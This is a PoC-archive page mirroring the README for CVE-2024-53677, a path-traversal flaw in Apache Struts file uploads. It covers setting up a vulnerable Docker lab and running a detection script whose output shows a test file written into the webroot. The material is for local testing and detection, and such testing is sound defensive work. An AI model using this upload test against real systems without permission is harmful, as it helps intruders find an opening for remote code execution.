Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-53677 PoC — Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks

Source
https://github.com/0xPThree/struts_cve-2024-53677
Associated Vulnerability
Title:Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks (CVE-2024-53677)
Description:File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in  https://cwiki.apache.org/confluence/display/WW/S2-067
Readme
# Proof-of-Concept
## Setup test environment

```bash
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
```

```html
» curl http://127.0.0.1:8081/upload.action

<html>
  <head>
    <title>File upload</title>
  </head>
  <body>
    <h1>Apache Struts 6.3.0.1</h1>
    <p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
    <form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
      <table class="wwFormTable">
        <tr>
          <td class="tdLabel"></td>
          <td 
            class="tdInput"            
            ><input type="file" name="upload" id="upload_upload"/></td>
        </tr>
        <tr>
          <td colspan="2">
            <div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
          </td>
        </tr>
      </table>
    </form>
  </body>
</html>
```

---

## Exploit
```bash
» curl http://127.0.0.1:8081/vuln_test.txt                                  
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>

» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
CVE-2024-53677 / S2-067 detection test.

» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan  7 11:23 .
drwxr-xr-x 1 root root 4096 Jan  7 11:18 ..
drwxr-x--- 2 root root 4096 Jan  7 11:14 forbidden
-rw-r----- 1 root root  226 Jan  7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan  7 11:14 META-INF
-rw-r----- 1 root root   39 Jan  7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan  7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt 
CVE-2024-53677 / S2-067 detection test.
```

Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK
File Snapshot

 [4.0K]  /data/pocs/2d3700ef2b4fbeee9e4dca29dcd8e4a6e1f6e5f9
├── [2.7K]  check.py
├── [1.3K]  context.xml
├── [ 561]  Dockerfile
├── [3.4K]  README.md
├── [4.0K]  struts-app
│   ├── [8.9K]  mvnw
│   ├── [5.7K]  mvnw.cmd
│   ├── [3.7K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  org
│           │       └── [4.0K]  trackflaw
│           │           └── [4.0K]  example
│           │               └── [2.2K]  Upload.java
│           ├── [4.0K]  resources
│           │   └── [ 870]  struts.xml
│           └── [4.0K]  webapp
│               ├── [4.0K]  forbidden
│               ├── [ 226]  index.html
│               └── [4.0K]  WEB-INF
│                   ├── [ 579]  error.jsp
│                   ├── [ 650]  success.jsp
│                   ├── [ 716]  upload.jsp
│                   └── [1.1K]  web.xml
└── [ 219]  tomcat-users.xml

11 directories, 15 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →